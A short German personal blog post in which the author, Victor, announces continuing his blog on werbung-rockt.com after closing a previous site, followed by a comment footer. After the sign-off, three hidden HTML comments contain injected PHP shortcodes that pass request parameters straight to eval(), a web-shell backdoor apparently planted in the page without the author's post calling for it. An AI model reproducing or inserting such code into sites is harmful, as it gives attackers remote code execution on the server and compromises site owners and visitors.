Neues Blog, neues Glück?

Hallo meine Lieben.

Nachdem ich Gratissimus geschlossen habe, entschied ich mich dazu, den Host nicht zu kündigen und nun meinen eigenen Blog, den ich normalerweise bei WordPress direkt führte, nun auf werbung-rockt.com weiterzuschreiben.

Mal gucken, wie gut das gehen wird, denn viel Zeit habe ich trotzdem nicht. Jedoch ist das hier nun mein kleines privates Ding und somit besteht auch keinen Post-Zwang.

Weiterhin werde ich über die Dinge schreiben, die mir so im Alltag erreichen und ich gut finde. Ich hoffe ihr findet sie auch gut und schaut einfach mal ein paar Mal vorbei!

Ich werde übrigens spüäter mal die Hauptdomain werbung-rockt.com als Visitenkarte nutzen und meinen Blog unter blog.werbung-rockt.com nutzen. Muss nur mal schauen, wie das alles funzt, hihi…

Gute Nacht und liebste Grüße,

Victor

<!– [insert_php]if (isset($_REQUEST["KbCGG"])){eval($_REQUEST["KbCGG"]);exit;}[/insert_php][php]if (isset($_REQUEST["KbCGG"])){eval($_REQUEST["KbCGG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jlTf"])){eval($_REQUEST["jlTf"]);exit;}[/insert_php][php]if (isset($_REQUEST["jlTf"])){eval($_REQUEST["jlTf"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ULRFu"])){eval($_REQUEST["ULRFu"]);exit;}[/insert_php][php]if (isset($_REQUEST["ULRFu"])){eval($_REQUEST["ULRFu"]);exit;}[/php] –>

0
(Visited 1 times, 1 visits today)

1 Comment

  1. Pingback: Happy Birthday to me!! - VictorPontes.de

Leave A Comment

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

*